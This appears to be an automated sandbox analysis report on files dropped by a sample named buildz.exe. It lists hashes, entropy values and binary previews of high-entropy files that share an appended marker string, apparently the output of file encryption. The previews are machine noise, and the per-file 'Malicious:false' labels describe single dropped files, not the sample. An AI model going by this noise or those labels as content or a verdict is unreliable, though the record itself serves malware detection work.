!...-.:.4.M%.W/.J..X#...W{I.*a.OV..fd._..^...~......P$J.vK......~.....i.(q..e.q.RS.Z.......h~(.m....op..?p=....h...1.?...RAg.A.|..b..{<wl.+...58....a5....].@...-A..$.-WwfDEQ...9].NVy.n......H..+`.C.p......'.oc...&3}|`...OrDw..Nq]ws.._vt..HWY.>...b(,H.o.b.U}...t.....U.........5....#.p:.E.P6...."J......q..h..b....._....f...$....*u......x...7vJ...}&.>.....R!.....s.9".j.....k...<.,rE...(3.F..\....L.m..9..........Vv,.r....S..W..e..6..n}.P.....6x.I.*.9......W.3..2.........
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1291
                        Entropy (8bit):7.832752246551643
                        Encrypted:false
                        SSDEEP:24:cfjPXShLy+/Dbjkm1+1wt0GjL1gOS5xPC7CkEkp96Sf8TGGbD:c7ah2E/kGzmGFLSfPgCk9p96DGUD
                        MD5:F8E9D96C6FA51F9D6E4B66D3E755BF06
                        SHA1:9B0970256D0F048D06355DB01B8D4B3EC7EA6E72
                        SHA-256:84F7D6F36DB52713A9E4F00331EFC638E38777A562D6D9FF3DD259C234878FFF
                        SHA-512:41642A6E4CC84B9855FC60BD8FE82B441F20337542EF82475A668753911061CF115E2F836B0A0FDC44229369EEFE7AC1264060B994C2C7CEFF8BEDA173230C5F
                        Malicious:false
                        Preview:<?xml..&..........r....#...l@)......X..'O.PA.^...s..B"..KA....J..\%.r..@....~W..1.qW.o.FP......S..R...F3....{..E.}].8k..u...gv....9....I....l..ER..0W..Ig,...n|.".F&.G<..k&VF|/.j^.[FN<.l.#.-p....$fAV.....m.=v@Fc)PH.a...a.....G...K.q..U.......".M.....E.9Q...A...uA..........|}.i....+.+...T..]\Kp.b.$.n.M..h........4.-8..je...nK.Y.r7.....X...Y...n+.....5...._e.:e.s.N#u...a...0FI"N..9lci...h11....Dc....Jn.4.iT.~./i..,.M........VQM`C...qh.;E... Q...c.G..+...T...]........8.o..5..k!.._.p.k....f......p.......7 .%f;&'...&-....TP.{.V.....o....B....r.p...U.zb.].. .t.....[...E..D.:BR....Iy.e.y..r.....3.....X..<~5B.I.2....PI...o9.w...RM.r.Q{F.....h.4:{.D.:`..K.}L..?...~w.M.y8U..l...U....9..iib.|.R...R..-s......:..y....S.#s...+C:r'.]"..=.....W}..@....A(G.D/b....M..M..L..J..'"2....c..?.c...v.........8.....v.@..N..U>.....A..J......t..&.'.dLc3n...3_R^.......@.q..a.k..%....V...F...t2o.f.q...#.........B.5.sl...s`%VP.....K.&..z...f....fc.A.W.....e.ht
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):834
                        Entropy (8bit):7.709810416221884
                        Encrypted:false
                        SSDEEP:24:3KMIZCiKZG0ucYWVi/yrRXYBrHWPsXwRwXKWGbD:31o10eWVIeYJHkwNUD
                        MD5:EA1D2C8C734605C0AB7AAD10BF3C89A9
                        SHA1:FEBFBAD8CC61CFBA4F041B9115AAABDA059BB5A4
                        SHA-256:65410F1FA4342F27E6294CDDD75F1B209E86763D63F765EA510A5A82247BECF6
                        SHA-512:2A74F9A98E1EABDF801749AC883F2E391405C372E54DDC73390D20A69D3067639C5C811B0A302388AA7D94F817133EA91EF313AE2B674C9F73ECA2E3B74860AC
                        Malicious:false
                        Preview:<?xml...(..].......A.......@.6.8.X..#.Hu.'/$.l.......H.......dr..s.@.p.u....{?G..W.e...(.x .C......o.}.....A]........%.....)...."..`N..5..7i.}z..........9g..o.}....f.....y....|p...:..J.._i%...M.&...O...n(.[NM,RK".....Q.e.7.QG......C.~.Q..Xrc8.dN..W....!.E,....c...d.u.......F..w.0....:......%......U.%.7..7..."..B..lqnFF..6.A\..N....Z. .D..(....Q._..d..0._;. ...q..<.V.gG...^../D..g."......O@(T1W\...5.Q..1..{..M......a.&.W....u..O....=NMD.-.k..V....;2{.......D..~..22yA.n..ne.A...U.$H...&Zz.H..8....X..._......id....%q......jFL.1/.o&.OE.Qa\BH..F.5h.]y.........,.qa.h...l{.@f..|Gd"D....{5..{...FBW.]..7$.#v.g..*....*Z.....Q$e.b....+.Z}.G35..Q.I.J..>7...g.....Q...})%..C#.\.9Lu.a^r.!+.d/"..R..a.q%.U..{..qS.].......0`.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):630
                        Entropy (8bit):7.663178149980873
                        Encrypted:false
                        SSDEEP:12:dO8krbFLdeHgYpcR0/S+mSO1VoNZ0nz5BVSTpUYy3+jWzVpd+gAhvz3n26Gcii9a:PkrSAYpScBBO1Vo+z5BUK+0ITfGbD
                        MD5:E4035CED09B7DFFDAED15FB2D69B4B73
                        SHA1:F70E03FC39D753B09ECCF03B82599B968C7DC57A
                        SHA-256:A6C5E94E9B194098EF9740FFB6DD7F89DDC705928C6B6DBA3009AD38EC99C842
                        SHA-512:914D52BD7BAB350869097714D81C92CB38BE04C97D120CB6B55E66C7C9441E159A054FAF9B064C7A218F5101E9ED7D1A4F4CC073AE918DE4E0FFFC2E526C91ED
                        Malicious:false
                        Preview:<?xml.'...e]....ju .ny.z...k2..L..n!...../cG.px..l.z.....&FV8~.....r...2.F.......b......... h....X....E.|.f%.!.........T.N...`.\.AC......`..J.!......*...z.o.s....h3..}Y.BqS..c.c;.IXnF..,.ww.[.(.r.a.T.giC'R..`....s..4.E.c....q..Ya..i...../.g.....*.6.(..d8E?^A..H......>n.b.+.t..'9.C....zt..]b.,..1... ;9b-..$0.-g...u..b........2.(..9..b.M.~..W.V,<||pVKgh`....t3.D.h.g.].+..$.`..a....b...g..........xv)@._.y...-.i...(i*.j....D.#..w.....D?$...U6W...M=,~...[Y-...]..o...k...,.....1H..E&".%5:}.<......f.ZH+..3....%.......EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):851
                        Entropy (8bit):7.722217540523407
                        Encrypted:false
                        SSDEEP:12:88jEoeaej9BuC0R/kmt7hmPKxQO0jVijDe6QQH/5725kW07njyK9t4SPOze26Gcq:PAFj9B90RcYbdcijDeTQH/5U+jDvxGbD
                        MD5:8B4742021750A28E68D2D69DF6D08526
                        SHA1:1CCEBDF59C0300EA052D4C4F26C23E857BFB8479
                        SHA-256:E6F4C2470354EA5703C0C42FF12E301C23BD5508BEEA7B2562240776C3900825
                        SHA-512:D210648FF98770526D10C5D35F686F6ECB34C1C7EB19C8880573B6A54F976B6E8C908635403415F542A596422E1B547EAE1EE597DB51CA35EF5E280EF93480A6
                        Malicious:false
                        Preview:<?xml.......K.*..3.yp.......IM#..E.5=....0..nj..:.... .-...7Ru.d..K@~\..\~..T2...!.h........6...?.'*....8.~.C".b..._.v%....,.>#.P/.>.]Q...k.3.........W@nR..C~.......fJp......g ...'...8}...]H.C.].E.%9A.U.2\.(.N....S..gD.5.?4u.Zi.....i....!./<...q..{....M....:0*R..J..JJ.....!.:.<..im...~RDfx.....z.[.D.(...........{....u..or.(...m...} ....:3...zr..t3.F=.C1l....(|. ....u....m._5..PN.....}..$.."..a7...E.y~...g.c.......=1.... !.'.U.#.,.1.z...qX8.E9<.dNS..4.L.HC}...0.c.DZ.. ...#7.i1.^yye<8..?v..h..c...3..[...L.i...$..2p......S.x...8..P...i..5q.....HY.:..|N[2.nc.A.B....1U....m....,.r,.6..g=4_....u.....F.........Q.....Q..ul....?...0....,~m.[.'U.p.kg..?0%^h...s`~q..x.k...Ku.%Uj).....fo..6.c&.lED..+`.a_.g\C.].I.$E.f"...>%.F^..y.....Vf.+.hEZ.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):6314
                        Entropy (8bit):7.970161505709254
                        Encrypted:false
                        SSDEEP:96:wFJPQAwqgmlKs9IjuVMorlhwOB15qE4anFbl2JgV5ID8Mwwslu076URtYM8dFA:wFJSqgrSI2r4w16sWKBMilu0mGN8LA
                        MD5:B7A07FCB4A93DB2723A03C9E0B274923
                        SHA1:DAC25C92D4D2DA2E2A256D261EE74D417410947B
                        SHA-256:10F02A3F8CABE3F2D5398E23D8DFF7CFF517C31C300955BA58A07C0E36C5A942
                        SHA-512:912E7C3BEC8E08D87AF54E5F5C373FB1FEF17228D9D21947B03FDFA397F9B008F0B23A206A9760311CD5DD010386BD4959707F6BE156FD0BA1C74315339DD46C
                        Malicious:false
                        Preview:<?xml...n......T....'-.....f!I"C.K.U.....TG.7...#.T....,..#O.[B..y.[{p.=.c.Zh..f3.*.$j.kJP....?s..b#./N."...Jv[l..5...D..-..O..n......jd..2..j.3..7.$..L.l.K..P.........3.r...{y]..P......5..b.....n.o8.p.V.h.}gB.WnC.."9........&*2o..!>.fxS.+......z.\}g>....j2..c....:PV.~.z.@....f..j|...5...yd:".q....H....a.....!d4......q...!......9..=E.Z.#E.}#.U=..s....RLL].Zm.X.HJ...q...th.'.y.Y[....@.se..j.!b..pP..PQ.......v.>.L.f.D..y./CN.....u.vK=.y.W..(..........`=f.^..r.L9.gg..\...CV\....J..c..n4N..m.S.."[.t(..-cNiIA.|.y:.O.....jV.g.g&..c^.LX.Uxjb./.N........d^...<.n...u.i..\.....-..`.@..I...3..N..7.'^.`]laop.s_....7.7.....uK.....H1......?*..6.....Ea...4F.."...\......3).U.g...kjCA..9.....\...w.y..A^.d...e)..~.S..f...@.u.\Nf.I._M..(.R..)..*.....:..#o....?..GJ-W".w.l;.o7..C....E......S!.+A.=..viX..8f.\....&..]U...K..3...p..*v;.....Y.R.w...........a..q..a.-.....yRxJ.cX.Y[.3.......~ .._....C...c....q..+.*..2.+.\C?.....+.'..z.Z....Ap(.BmJ.\|.X....Hu.P.[.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1029
                        Entropy (8bit):7.803587165007069
                        Encrypted:false
                        SSDEEP:24:slc35H5yKmBaItWdFM1kO95lKmV/TaJlkjee9DvFeXDaGbD:l5HJcaIsd9O9DHV/TF1eXmUD
                        MD5:032DA9C938F2EE17173DB877BFE8BDFD
                        SHA1:C2ED6DAC2C6282FF9226DABC7D78A23D88DAF980
                        SHA-256:66EB6287913A4DD38EDDADF38FC070274A96DBFD2596AC6438066F5B8219A9AD
                        SHA-512:E6F21D62F5BC1974B98FD4488BB0E4348EC73D3800B85D77134C8A6C2B97F0A38F5866FFB054642D36F82BB0C1969E0F7CAB69293FF83FCA308922172C31ED06
                        Malicious:false
                        Preview:<?xml.{...Up.`.=......S^.0.`-m._....f...5..Xh}%FV.1.F.W.MI.....U..#.]....f.....NF...MI..x.7...F........M.Jj..r...o....;..zf.. V.$}.......~.0.....)..[<..}...'.....'g.^...8..u&..}".. .kF..TNJ..h|.Y........Whj......4..j..w.k.iN8/..|c.K...f..N...E[t.C......ZjcY.....~P.V..>{..w.Z,.......;..^.m......$>td.USE......Pa\7.....Hh[@3...[.:.P.`...)8..}........m..........}..j...M....jN.r..5...z@.8.9|...(.......=m.._.(..4.@...|?..4.u.O."$Pam...,..ZI5.......-..........)...U (=lv..K.{.3...PS...P.+_R.O...5z..).KL...{:?.....j..t.[.f..4q....z....\B.....@<H..\...q...!5n...X....`^...........D.`Y.....u:9..U........a....n.eE....ba.x..K..S..{e..^G2..a`g2k.}h..G.A;..).m.(6.O..O..<.<2.....e.W.>.r.y|...v...k.s ..s...L.Z).N........d+.'..V..0..'7..W&SI..]./..`>.}.51$q....M2..h.-.$Ho.|.{VO...t9..Y...z..Dz.b...9........q..J.....Yh.s.w............;d..Ni....S....3..G.....@)^~..+.5..mJ...PH.T9.@&j...0.....d"EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1040
                        Entropy (8bit):7.760744631286387
                        Encrypted:false
                        SSDEEP:24:5LxiPshwE/H4GFFKJ4oRrtv+ncodIqWjYxa7oMv8um/pj36al0FTG8/XvpGbD:fs/s4+1uSdHWS0oEXmRbaJGQUD
                        MD5:044C95DEFF7E3ED72535328DE4549AF6
                        SHA1:7CE6794ED45BE9797C7E4DE132D19A02CD9FF6BB
                        SHA-256:7980A49BC55857086C63B972C8A1A4DCA4D84D3866E027D2F1B712E29A7903DC
                        SHA-512:C9F98D821A78254EFB40B2583CBE6D1EBF898EC4C1DEB4998970433917379D3A9D4A0EC05FBCFE73445C48F65262F5009391056A6FDE8A3C68B71E6E69E92E9A
                        Malicious:false
                        Preview:<?xmlG...M...A .M....=.|...A3......O.GA*.k.q....p*..q..D$.G... .];b.mDiW.z.l.Y.V...=.]c.p.....Qx^.d.3F..,.zD..]=.o.?..&.K.]j.m.....z) ...l].<|B.29....+.%).'......bv...j...n`...Y..S..AD...>.;.Xx6...sC1J..P....@.%....a7,...n.j..l.i....9.....p.|..d%G/.DL2....(i.Q.7n5^..u5.i.........z.......md.....m....jy....:......J..?tN.f..di@V.#2......l.v?M... B.m...k.....h...M..e..0\..v\.....m.q..:{.A.h.UQ4..........6g*m.f......d.].1E....?...J.:\.....,d.ID..+..~.E.+.H...3.b{.9.l.@...m..n@P..D1..........E>...u=\j...Ky.-T.\q.......1..)`..%......i..xY^......,.6..U......>Q...<3..&...h...?........FN.....i.Q..l.J.C..C.>)Q.*....u2F[C.....a.v..tQ...u..I.U..".o..B...q...ci.|.t.....:.+.S..7!37."UJ....|.0{W.t.Q|......+2.G.eP..N....j.m\..-]..q....z...W..g:I.._..i..Y........V...^...z..ugFFe.9.e....`....7.8F....lo....XG]Pl</.nNH......EB..Q..+9..(....E...f....O..a.i,.Ah$|.{.../.$.....~.\<.'Y...Du.j/.E....0D..|.0.*.........3.|.cX)FQ...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPM
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1415
                        Entropy (8bit):7.861149008232125
                        Encrypted:false
                        SSDEEP:24:4dELlWq3NSyQ38tvbB/kD9dflMPr5Xh6uCnGZlFmnLXwGbD:4d/qdk8dbB/kDPfiDVbCnuAXwUD
                        MD5:5B0F797A30A82859948E8CB58A9A3D26
                        SHA1:F19C02F3CB9D7456B6F767A15D7C933FE94E7221
                        SHA-256:4CCA73328532CA48B49CD0A4EA66F1D559EEB1407E810C29710314D3D7C7C0BC
                        SHA-512:FE83200A83A3DEFF4B6304F15F9719817C8E312A16D8DBA4BD2ED98F933151BCA7B1FD7FCF5ACFD442394A7E7D56DE2D84BF89708AC04069DDA13E356195ADC6
                        Malicious:false
                        Preview:<?xml.T..tu..0}P7...n.QVw.s.....K........F..e..T=Z....._ar......+k..C...2.z+.1.8...V+X.....41.'"o't....G...YW.r....{...,s.A{3...6@.....P.L.....YP....(.....G..6..rL....Wm..]. .d...lae...HD.......H...Gl........-S.f...B.....0.+2..Q..@..v.. ..^LP...Y.?.x....:v.......l....Kn.....Zs..Q.......;.t......$.O...[.{P...&.Q.w(..I)J...+ ..#T..A..+A)._.3....i:...ha.[..YID...#.,...te.....t...aB2o..c...O..P..y..$.S2...:A..h.../..b]....K..^.J.e..o...Ek..sT.),B`z.,(.>@.4)..&I>...Cz.....tx.-.:(*i.....=.z.....N.@..J.G.3B.G...x...#.]b.Ty..j1.....c1J.]a..lKG`..ok.D.:.)....f..d28..w]..;..bT.6.."......q..+..|..q.5...)...@..j.%.+..0"....r63.AsAo._u..1D.......;....`....s.....JJ5...8.c.1..@#m.O.p..orl.T];......._6=..$v..goU..~...Z..a..t.pu.+.H..m.G....A;|`.... ..<|..HC..O.\>..i...5U...N...=.&.Y.B.v....T.2......y........t?.Uq;3tq...".I.[=......lY...h.!.'u......W)@_..>%c.....$U.R./}W.M..mq.)N^ccq.8..).X.t;5.)m.y.r..'.../..Zj:M.....>r...K.v..n=xa...t5....@.>VL.Z.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1073
                        Entropy (8bit):7.81258594426086
                        Encrypted:false
                        SSDEEP:24:6Apkar48wW25LxDabeMqBL9U9A+KLWo7IB3hAUjt0xaGbD:6Apk648327DdMqBLwA+PhBRuxaUD
                        MD5:7BCAF54636FDA98D017C0F15A5170133
                        SHA1:DDAF5649E595AE9496C52D6C547779930F65EC3F
                        SHA-256:C92EE7DFE55ADEBFEF0F6033BF5F42924C684CA67E05D5DE2D0DFC9930066A1A
                        SHA-512:8D820170F38E28EF4AC63DA275C6A3E86CFC4B94C4842B874339E45D458E183B6509FC2B6E0469C4BFA884683B41B3125CBC453E0258B5C29845476F9E6A332E
                        Malicious:false
                        Preview:<?xml.....Il....T>.(.....7E.d^.B..j.U.........O.[....-.b}la.>.....P.}.rQ...8`O..._c....._S......n.0`\.....2..u.... ..8....6P......?.X....s..:....B..;.&d.?Go..u.k[.m5....[..N.....[.lr..f`..[..r.j...4....8.........~R......!...i.|.b.c........K]....+|.u.+.\....u[rY..8.*.S.._\btY%........q.mS.........?._.....).}g.tBL!U.c$.o..Y.{.{0d...U..n...Np5.7.6.i.%..0...|..I...Ab.p......s....I...G../...d....0.+.G....:.......b....V.....'.F.Mg.._...6.5...R.......)..b..SZ...D...de.u.O..y...M...w...0K..iT_3.B....r..@.:..........;.|.P...>..%...n#.m..&CC^...Qq.N.....4.E...X.h..@.......\X..1U..qL(...z..N1..m.L.|..._._.^...O......0.m....[G.....7..z.G... ..j~X,..$N.*..+....1............K.2...lN...K...=..3.=(Rz..ar5..!.s.<H.e..;.2.B..b..<..\...,.[I.q!.;.C]1.....f...2w......K.#?o......Q1.o.x.]Ggj[.X.0..Q..M..5'.7...V..{.....m.../Lm8...)....|.2......D.....<./..yM.......u...k........W...y."....U.B.N...gN.tt......?........c-..M+.h..g?...Ugi\..o.SH|.......R..EdRvS
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1154
                        Entropy (8bit):7.825294681637825
                        Encrypted:false
                        SSDEEP:24:WmPjKJP0LHW5HVHF1kZTZp89UYEPKdgKHmCHzyuOZGbD:lPk0LHW5HVlCZWUYESdzyzUD
                        MD5:833827CBBA831C5439D997D8B80FA76F
                        SHA1:B45010C015E65EF683A830F80377E35359EA9C02
                        SHA-256:27AA503D0442885446C7F1A74DB7ED2B5A3F81B6BD331D805C62E46156DF1166
                        SHA-512:99B4AB2EC3BFC339C37A931D4C5068B2EA145FE88E406CC392770D5B887A5F2DC980AE86FC1F7B26DC80B20A137A52D4C9D82274528D753A32B3C875A9817348
                        Malicious:false
                        Preview:<?xml....?[..(.L...#}.. .P...t.. .Rzj...XQ.9...0p.H.y.l..._Z{.......Ng....tV...\.../...6o.f.}r..g......f.)...h.....h.X.........|].5...==.%.q..w..a}.6.p..A$.9G. ...d...&.pO...%.}..j.C...;.=...h:.6[...)....Dj.`.T.U...5.:..U...../#...V..#....V}ejF......f.t.8R........4..o..,A-.....'!.*.......@.N........P..B(.p...F.5..2n.T.?.@B?.'..n...`...`.. .3 .Z.........WWw[.\..d.WE...\:..."{..ypx.!...K..sxHd..A..I.K.K.....xY..l...?c.g...0..;.......Q...*.K=....&.N..0..I......E.*..>.>..g.."`.2.....Z\...Bk.........p...`.Xl.`.l...).Va.=....j..........K.. .FZ\+...6ap..$.a.wD..:...qLT.?....J`ls.n..V7....Jz.........S..m...w.....7`(.4....;..:=..6..oM)....Q.....V|..5..4.].....]~d.C$.L.M...2..h.=Hg...H(..w6...s.i...c.3.\..J.J..I#.n.P......v..e........s.qR..S .n..(.2.c..p..Y..d..P.....2c.....V.*...%.....}.j.....8...J....8....A>.......Z.....5.........yA.p.y...Q^wEV?..z"...{...s.T[.KN.B..........."..=...%k|...!".Si_.9R.25..;*].....\....S&.l2J.G..O*....I..~..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1902
                        Entropy (8bit):7.884603405137441
                        Encrypted:false
                        SSDEEP:48:RzQl9OANu4w4iEZ9ycthPocy/LAZcDhofUD:Gl9RNuqiE98j/d1ofA
                        MD5:510015904611940BB0FF2A8B0182EBB2
                        SHA1:631C41CD4F2813F0EA97901E5F30525C43401118
                        SHA-256:4259CB78DDA518D8A1895F88312BBC4E95306E449CBC35FE144D956B2450C3E0
                        SHA-512:289E56B10D68693CFC5765FEA84959069EBA23674E01A349657D9175279A0EC5837F8982D34A604E36FD4EC4E260A404BDACA9140F4C8AF4A8F211244CF510B4
                        Malicious:false
                        Preview:<?xml.I.U.....}......W26{...m.....F..DC.lc.(.").%D.k....Z.....bl...r...<.V.\....%A.4..P.X..H....#.i........#.;..b,.7K..6l.C..=..Z<.6..Y..l..{.\.....[>Z...!...C...J.M...o.(LF.N.....?.3?^..h<id...z.{....Ii.o....!..>.....$v.f......$.i....[.}.?B'.62...m..%<..UV.3.....=.kj.........E.~a.e,.`[....\.I...8...i..3....K9.t7hiz..f.A.qS.F....(.V..O.....3./......SL.2s.N.c......bE.K._F..h.E....5.....Q..z.....N7....tk.j>YO..gT..xX..*h...>c. .. E...^...].f.#...k..."..j.,.J*g..$t`..D.jS..v..-.....B..'..B...Pb..YA.$.... .....A.t...H.......<...A..s.X9.l9F.C...#.p.N...-........V.`..%i2./.W~P...".>.....d....v4..5.......N....s2.nu%...P....P..yL.E..........L.%.8....3.....Q.......|@..a...!..o...@...fo.~.,i.1......A...f.h...V......m.-)i=.....'.........o.[..m..5)._../..V...^...a......N.{ac.N0.......C...h..p7..'9M.....f..m.r <zG...,sr.'.....d.EybJj.V.....v....I~.N.....a....{P..?..d7p.....F.(.....2[FNO31)<&....8_N$5e.xf.%(..'...T9X..8.l.=qe..3.S......./.Rp.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):712
                        Entropy (8bit):7.6942455060634805
                        Encrypted:false
                        SSDEEP:12:jMpyALbaPBltRgM2yBab6AY+baWlGYzzILczGIiv+oeVhfO4WF26Gcii9a:2nXaXfab2WlGgcgriWy48GbD
                        MD5:3EC772900E9F532497353C88210CB039
                        SHA1:EC395527F94B25A406BE22BADF3091090E520CA7
                        SHA-256:0494F9F780EB6129176412220A966A9322C1EF7652BBF99F0233474F3ED89B27
                        SHA-512:9B9EA1FBFF8D790D12C3E7DEB9895F1A5E29F1E17E485D33E726A470D9282C9675B25FF6B1B3CFC9DC894764609C7C456AD006E91FC57F4052A24A2441CA4BB7
                        Malicious:false
                        Preview:<?xml.A!H,..8.#s..2n.h..t......Q*.MH...]6rx..\U../....;...+J.6.,...r....`......2S4....m..L....?.V..`*e....2.. ........>.;U j../..F..4..1{Q.`l..Qb...B..R..:M.......... L...<U...ozB..D*..p....'t[...LUp.F.0*.R..+e.E....~....C..6.>_!}........i...}.W. _....op....Y...8...P.x.*..*.T.b....`*@.'.../.....O.s..(.."Pa.q.,.x`..d..]...w.4.p.b..3..KrP.i)..:/...F......=.$.0.t.?..%..2@:p.0.R.H.bIH....4.w..$...b.v_K..O.....T..JY.\...G.h.j.o7&.TYE.%.ZE..&W...T.Y%..g^.#.....4.d..<z..zQk.^.|..!vN.vX.,.u.^..N...6....#..lh...YSQUL.L.:.Z-..=,N..,G.[...:.....0..X......y...m..Y,...Q.R.h..."..B@.)[.....@.6.x...K..M .=d.;..'V..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1707
                        Entropy (8bit):7.886630619200716
                        Encrypted:false
                        SSDEEP:48:IxD4LTXA+j2sk/jSzkzfF1UEsrNlb3mGcMBUD:IxgTXA5skWg/fKLb3cMBA
                        MD5:5ED5282AB3B9EB2E3BBD33110D5E85A0
                        SHA1:92AF9545643028DF72754C4A642B4211BBC26629
                        SHA-256:03B9D7B454447D4F6666377877D300B190B4491AF144B8ED627DD08F36DDC713
                        SHA-512:F221D521642FCEFA37C3F9CB952EBBC4183BBA3AC09C17D513DF2A7C2C7BFCD8F7D6929B4F20523A2DA0F2A62DA664DE360233E913663E1DA63B418B3B17D440
                        Malicious:false
                        Preview:<?xml.\.&..<.?.(-..s.x..-.7..._..Q.<....9.."..0V.L.8&..mg.C.L.).]M...........'...$..lDv...\..<..D.O..........J....*.p...#.j.r....e....}-..$t.9.....b....\.>.UJ..N.C7`LPy9..x...n..< .N...N..]..n....J4.O...A....w.n...b..."...S..3...}.75..d....0..h...m~J.,#{.....V.e...px.!.$.............hq.k{..i...P.K9~'i..b.v.\...@..R{_.!...&.....N./...]V.&..!.|...|O...a....A..a........n.}.*..j....Vf.Z.:;&Y.9...b6.....8)b.].v....".m..b..g...zHd..'.`.;....,..m...$..L.....N{.2-.....[.-Sfeb...4......%...o...i.Q9.K...e....W}.....nd..=.......7&.9..........f..&....|.....;*....#......8.H..f>...../..N../..~.F./...t...y..=4..,.{.W.!.t..)@.1g..;.......`...{83.HF..H.c......|....a3"..".x.31.....I..d......1s_...e.X* W..(.8.MWZ=...(Q.fc.=.z&.N...M...gv..........%8.PE.c.......[.#ypr..#.....|.I/e....e.F.....2R]..~.).s..s.$A..w....I..[KB-..{.....~.....n..q.<..'E....{K&..Z.L5MeVQ.u......!.Ew....U.aL.f...w....(.v.(_.x:.)....].].G.....n...4=....E...9...3.%.. ...$=.@d.TQ.El...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2111
                        Entropy (8bit):7.896574346532931
                        Encrypted:false
                        SSDEEP:48:GNQPaAX+fnUbS8FRc3Om6DSQMTkV2InpQeU7jPwUD:GSnSnUbSibmaSKAXwA
                        MD5:24B694674981ADEED6CB22AFD5397C94
                        SHA1:D7C190A2B6E577744EC86E9348897AE4BEC04DA1
                        SHA-256:684CAE1425C8D744AEDF77E31F464FAF6B554F6D9D853B7E8204BC3C0E388F41
                        SHA-512:E01C256B2F06E1FA8A520D0E397DF788875230B5B1376DF6CA0A908F18735AD8F988A1B1007428ED53C17EFEC9A4906CC4AF792F8AAA1F74D831E6F984B301D5
                        Malicious:false
                        Preview:<?xmlf....r...Q.fn.x.t..h...|....sEy..R.c..x.8....7#.[.76....h..;.jc.xnjp..80..<..^..F.z4c.../.....\.RS...?nS...y$..a...8...0..n..0d.....:+..J..6.9..l.a....qt]}g8._h......L2.........&.1.8:.K..J...WW.x..P.QQ._..|.x.0..g.H...q] .......O.G.E......./|r1.K..W.....Cy*Q=q..0.._.p..y....k)W.c...w.h-..i>....l...Q..mTk~'..e......U:wK..;....eR..I(M.K.1.%...U.+A.J....L).A.....`.....g!:...-..t$.SQ..3...e...A..u...!...?@..."vP.Yz.H..M.[...hh.T}.x......_Z..I...%*.s.C.n.y..Q...?j.0X........B.H....".A.Cv|7."~.....,......>.'.O..x@.H......#Mcm8.":..!..\2....b..x......V.|Y."/........Gp.....<....(.O...$.8..+..}..9..v.....6[.$d.x..2F...}.x. ......ZZ8...N..<..l.{..3.....l.b...4t....Q......L...)..w>.....=mW]\.VD.Z.%(5..._.4V.*..v...../....^.q.Y.\.l..`8:.v...PK.%"...CQ..Tm.DPe8....">th..."..E.<. ...vF@."..z.W...92...WY...|.&.Q.......j.).hep...2.D3.s...~>.m.p..~Ow.K.{@......l\&.>...t.J....7.Guq..h.w......j..%@V.._..+.[...a.\);.3y....r......\..Y.V.......0;...b.@.$...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1732
                        Entropy (8bit):7.87153743667885
                        Encrypted:false
                        SSDEEP:48:8lMmFCHGalpwiMmePFrWibjE4u6pxZdjIJgXz5UD:X2CmewkqF5X5dkYFA
                        MD5:6F99876F7A447E7BD78EE9DDA347E844
                        SHA1:C867085DD824131833F09A5F7B4F808BAE1C3FE6
                        SHA-256:DCF4FBEB6652F6BF1EFFA29C59D4C2F84A90CFF01CF16D7BF9D57A575A0BB953
                        SHA-512:16A43B0519C7946C98A77FDB9B9239A5A931303B691AC675A7F69AD0BC7B46173B32AD44821843ACA24831462461A95426B9E9AFBFB41177EFB37D91A742EEEF
                        Malicious:false
                        Preview:<?xmlx.z.`..gb...._......q.X-.&`|.Hl.....b.(...$.N..[.."$r.,..u...[.U.g..).-...J...r}..&T.....J.......YZ.R....4..k.s.xu.<...N.2G<w1a.BHY......Y..bm..*>.wE..A....t..;...8.R4.g~8<.....S.6c..0...!......f.z.7.ssC...C... ~.[r...1..d.`..$.*.d.N...],.C.bK.....4l.W0...E.....z..^..X....|.n....w{...b..{..Q...]...P.'fL.....S...m..8...A7Yhx..u...EJ..,]...=.5....J.YS?...%n..^...6...).,...[.O..k.#C.).........=.xy.....<.b.=ZF%S...l...#.....M.d......t.x.O.....'...e.6.F..wa.&*h....O.%[_.c._.:d..s..t..fd..._.U..E....sT&.....2.r.p..(.H....*.&m..Z..O..2........g...@.6.K.~Vj.u.......%l3Y`3.LR$..e.? e..h...-{..Q;R.K..Y..7?_.'...x..>......4.oH...%.H.w...a..D..T.8..m.}=.....r8b.\...3./.HQ(.TI...ew.|.pg...g.....l....h . fa>........'+..4u.......*...`....?..LD.....\,v.2.3.r...J.zv...|}..5N.....%...`....l1 